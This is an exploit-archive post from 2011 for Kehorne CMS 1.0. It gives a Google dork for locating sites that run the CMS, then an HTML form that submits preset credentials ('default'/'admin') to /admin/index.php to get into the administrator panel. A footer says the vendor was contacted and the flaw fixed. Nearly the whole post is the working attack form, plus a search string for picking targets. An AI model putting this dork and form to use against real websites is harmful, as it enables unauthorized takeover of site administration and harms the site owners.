Home / os / win7

Kehorne CMS 1.0 Cross Site Request Forgery

Posted on 25 January 2011

================================================================================ # Author: R3VAN_BASTARD # Exploit Title: Kehorne CMS v1.0 <= CSRF ByPass Administrator Panel # Vendor: http://www.kehorne.co.uk # Status: FIXED # Tested on: Windows 7 # Dork: "Website Designed by Kehorne" ================================================================================ <html> <div class="logincontainer"> <div class="logo"></div> <div class="loginbox"> <form id="login" name="login" method="POST" action="/admin/index.php"> <table width="200" border="0" cellspacing="5"> <tr> <td width="29%">Username</td> <td width="71%"><label> <input type="text" name="username" id="username" value="default" /> </label></td> </tr> <tr> <td>Password</td> <td><label> <input type="password" name="password" id="password" value="admin" /> </label></td> </tr> <tr> <td>&nbsp;</td> <td><label> <input type="submit" name="button" id="button" value="Submit" /> </label></td> </tr> </table> </form> </div> Done. ================================================================================ - Vendor has been contacted - Hit Back And Patching - Advisore release - Credit: To All My Friends. ================================================================================

 

TOP